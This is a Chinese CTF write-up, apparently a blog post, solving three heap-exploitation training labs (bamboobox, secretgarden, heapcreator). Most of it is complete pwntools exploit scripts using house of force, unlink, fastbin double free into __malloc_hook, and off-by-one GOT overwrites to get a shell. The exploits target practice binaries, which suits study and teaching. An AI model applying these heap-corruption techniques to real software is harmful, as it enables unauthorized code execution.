lab11 bamboobox
先来看一下这题的基本信息和漏洞点
以上就是这道题目的漏洞点,大概有三种方法可以用来解题:
方法一:利用house of force,修改top chunk大小再分配chunk,实现任意地址写,调用magic函数
具体的原理可以看ctf-wiki中的介绍,不算难理解
#encoding:utf-8
from pwn import *
context(os="linux", arch="amd64",log_level = "debug")
ip =""
if ip:
p = remote(ip,20004)
else:
p = process("./bamboobox", aslr=0)
elf = ELF("./bamboobox")
def sl(s):
p.sendline(s)
def sd(s):
p.send(s)
def rc(timeout=0):
if timeout == 0:
return p.recv()
else:
return p.recv(timeout=timeout)
def ru(s, timeout=0):
if timeout == 0:
return p.recvuntil(s)
else:
return p.recvuntil(s, timeout=timeout)
def getshell():
p.interactive()
def show():
ru("Your choice:")
sd("1")
def add(index,content):
ru("Your choice:")
sd("2")
ru("Please enter the length of item name:")
sd(str(index))
ru("Please enter the name of item:")
sd(content)
def change(index,length,content):
ru("Your choice:")
sd("3")
ru("Please enter the index of item:")
sd(str(index))
ru("Please enter the length of item name:")
sd(str(length))
ru("Please enter the new name of the item:")
sd(content)
def delete(index):
ru("Your choice:")
sd("4")
ru("Please enter the index of item:")
sd(str(index))
def chunk(i):
return 0x6020c8+i*0x10
magic = 0x400d49
atoi_got = elf.got["atoi"]
#--------------------------------------------------------------------
#方法一
add(0x50,'aaaa')
payload = 'a'*(0x50)+p64(0)+ p64(0xffffffffffffffff)
change(0,len(payload),payload)
# gdb.attach(p)
# pause()
heap_base = -(0x50 + 0x10)-(0x10+0x10)
malloc_offset = heap_base -0x10
add(malloc_offset,'bbbb')
pause()
add(0x10,p64(magic)*2)
#print p.recv()
pause()
ru("Your choice:")
sl("5")
getshell()
方法二:利用unlink操作,调用magic函数
#方法二
add(0x80,"a"*8)chunk0
add(0x80,"b"*8)chunk1
add(0x80,"c"*8)chunk2
#需要注意,这三个chunk的大小都要保证不在fastbin的范围内
#因为fastbin的size的p位默认为1,就无法进行unlink操作
FD = 0x6020c8 - 3*8#在bss段,0x6020c8恰好存储了chunk0的指针
BK = FD +8
payload1 = p64(0)+p64(0x81)+p64(FD)+p64(BK)+"a"*0x60
payload1 += p64(0x80)+p64(0x90)
change(0,0x90,payload1)
delete(1)
#构造一个假的大小为0x80的fake_chunk,同时通过堆溢出
#将chunk1的pre_size和size进行修改,使得size的p位为0
#在free掉chunk1的时候,fake_chunk和chunk1就会进行合并
#这时就会对fake_chunk进行unlink操作
#这时就要对FD和BK进行精心构造,使得能够绕过unlink的检查
#也就是使得:FD->bk = p && BK->fd = p
#在通过检查后,unlink会导致:*p=p-3*8=0x6020c8 - 3*8
payload2 = p64(0)+p64(0)+p64(0x80)+p64(FD)+p64(0x80)+p64(atoi_got)
change(0,len(payload2),payload2)
change(1,0x10,p64(magic))
#这时向chunk0中输入内容,实际上也就是向0x6020c8 - 3*8中输入内容
#于是,就可以为所欲为地修改chunk_list,从而构造 UAF
ru("Your choice:")
sl("5")
getshell()
#ps:这里有个玄学问题是,只能改chunk1的为atoi的got表,改chunk0就不行。。。很迷
方法三,利用unlink,构造system(/bin/sh)
#方法三
#前面的内容和方法二一样,paylode2后就不一样
payload2 = p64(0)+p64(0)+p64(0x80)+p64(atoi_got)
#ps:是真的迷,如果用这种方法,改chunk0为atoi的got表就可以成功
change(0,0x20,payload2)
show()
ru("0 : ")
atoi = u64(ru("2 : ")[:6].ljust(8,"\x00"))
print "atoi----->"+hex(atoi)
#通过atoi的真实地址,去libc查找可以得到以下:
offset_system = 0x0000000000045390
offset_atoi = 0x0000000000036e80
libc_base = atoi-offset_atoi
system = libc_base+offset_system
change(0,0x8,p64(system))
sl("/bin/sh\x00")
sl("5")
getshell()
lab12
醉了,这题和网鼎杯半决赛的pwn3基本上一毛一样,就题目描述改了一下,当时没做出血亏orz,做法和那题一样:2018-网鼎杯 pwn(部分线上+线下)
直接贴exp了:
#encoding:utf-8
from pwn import *
context(os="linux", arch="amd64",log_level = "debug")
ip =""
if ip:
p = remote(ip,20004)
else:
p = process("./secretgarden")#, aslr=0
elf = ELF("./secretgarden")
#libc = ELF("./libc-2.23.so")
libc = elf.libc
#-------------------------------------
def sl(s):
p.sendline(s)
def sd(s):
p.send(s)
def rc(timeout=0):
if timeout == 0:
return p.recv()
else:
return p.recv(timeout=timeout)
def ru(s, timeout=0):
if timeout == 0:
return p.recvuntil(s)
else:
return p.recvuntil(s, timeout=timeout)
def debug(msg=''):
gdb.attach(p,'')
pause()
def getshell():
p.interactive()
#-------------------------------------
def create(size,name,color):
ru("Your choice : ")
sl("1")
ru("Length of the name :")
sl(str(size))
ru("The name of flower :")
sd(name)
ru("The color of the flower :")
sl(color)
def visit():
ru("Your choice : ")
sl("2")
def remote(index):
ru("Your choice : ")
sl("3")
ru("Which flower do you want to remove from the garden:")
sl(str(index))
def clean():
ru("Your choice : ")
sl("4")
create(0x98,"a"*8,"1234")
create(0x68,"b"*8,"b"*8)
create(0x68,"b"*8,"b"*8)
create(0x20,"b"*8,"b"*8)
remote(0)
clean()
create(0x98,"c"*8,"c"*8)
visit()
ru("c"*8)
leak = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak -0x58-0x10 -libc.symbols["__malloc_hook"]
print "leak----->"+hex(leak)
malloc_hook = libc_base +libc.symbols["__malloc_hook"]
print "malloc_hook----->"+hex(malloc_hook)
print "libc_base----->"+hex(libc_base)
one_gadget = 0xf02a4 + libc_base
remote(1)
remote(2)
remote(1)
#debug()
create(0x68,p64(malloc_hook-0x23),"b"*4)
create(0x68,"b"*8,"b"*8)
create(0x68,"b"*8,"b"*8)
create(0x68,"a"*0x13+p64(one_gadget),"b"*4)
remote(1)
remote(1)
getshell()
lab13
常规的保护机制
这题应该算是一个off_by_one吧,只能溢出一个字节,改变下一个chunk的size,然后再free,然后再create,再进行操作
主要的漏洞点在edit函数:
主要的思路是:
*create两个chunk,用chunk0溢出到chunk1 的size位,然后free掉chunk1
*申请一个新的chunk2,使得chunk2落在chunk1size的部分从而修改指针
*改free的got表为system的地址,然后使得chunk0 的内容为/bin/sh,接着free(chunk0)从而getshell
exp如下:
#encoding:utf-8
from pwn import *
context(os="linux", arch="amd64",log_level = "debug")
ip =""
if ip:
p = remote(ip,20004)
else:
p = process("./heapcreator")#, aslr=0
elf = ELF("./heapcreator")
#libc = ELF("./libc-2.23.so")
libc = elf.libc
#-------------------------------------
def sl(s):
p.sendline(s)
def sd(s):
p.send(s)
def rc(timeout=0):
if timeout == 0:
return p.recv()
else:
return p.recv(timeout=timeout)
def ru(s, timeout=0):
if timeout == 0:
return p.recvuntil(s)
else:
return p.recvuntil(s, timeout=timeout)
def debug(msg=''):
gdb.attach(p,'')
pause()
def getshell():
p.interactive()
#-------------------------------------
def create(size,contant):
ru("Your choice :")
sl("1")
ru("Size of Heap : ")
sl(str(size))
ru("Content of heap:")
sd(contant)
def edit(Index,contant):
ru("Your choice :")
sl("2")
ru("Index :")
sl(str(Index))
ru("Content of heap : ")
sd(contant)
def show(Index):
ru("Your choice :")
sl("3")
ru("Index :")
sl(str(Index))
def delete(Index):
ru("Your choice :")
sl("4")
ru("Index :")
sl(str(Index))
free_got = elf.got["free"]
print "free_got------>"+hex(free_got)
create(0x18,"a"*8)
create(0x10,"b"*8)
edit(0,"/bin/sh\x00"+"a"*0x10+p64(0x41))
#debug()
delete(1)
create(0x30,p64(0)*4+p64(0x30)+p64(free_got))
show(1)
ru("Content : ")
free = u64(p.recv(6).ljust(8,"\x00"))
libc_base = free- libc.symbols["free"]
system = libc_base+libc.symbols["system"]
print "free------>"+hex(free)
print "libc_base------>"+hex(libc_base)
edit(1,p64(system))
delete(0)
getshell()
#debug()
网友评论